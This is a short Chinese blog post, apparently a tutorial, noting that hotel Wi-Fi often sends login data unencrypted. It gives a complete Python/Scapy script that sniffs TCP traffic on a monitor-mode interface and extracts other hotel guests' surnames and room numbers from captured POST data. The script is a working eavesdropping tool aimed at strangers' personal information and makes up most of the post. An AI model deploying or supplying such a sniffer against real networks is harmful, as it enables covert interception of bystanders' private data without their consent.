版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
一般宾馆都提供免费的wifi
这些网络中一般不会对流量进行加密
我们随机连接一家宾馆的wifi
然后查看发送的post请求,你或许会看到你的信息以明文的形式发送到服务器上
你可以联想到网吧,如果要用手机登录网吧的wifi也必须输入验证码
你的输入还是老样子
python 路径 -i wlan0mon
import optparse
from scapy.all import *
def findGuest(pkt):
raw = pkt.sprintf('%Raw.load%') #sniff抓到的数据包二进制的,将其进行转化
name = re.findall('(?i)LAST_NAME=(.*)&', raw) #查找其它人上网的名字
room = re.findall("(?i)ROOM_NUMBER=(.*)'", raw) #查找其他人上网的房间号
if name:
print '[+] Found Hotel Guest ' + str(name[0])+\
', Room #' + str(room[0])
def main():
parser = optparse.OptionParser('usage %prog '+\
'-i <interface>')
parser.add_option('-i', dest='interface',\
type='string', help='specify interface to listen on')
(options, args) = parser.parse_args()
if options.interface == None:
print parser.usage
exit(0)
else:
conf.iface = options.interface
try:
print '[*] Starting Hotel Guest Sniffer.'
sniff(filter='tcp', prn=findGuest, store=0) #上网大多数是TCP流量,我们只截取TCP流量
except KeyboardInterrupt:
exit(0)
if __name__ == '__main__':
main()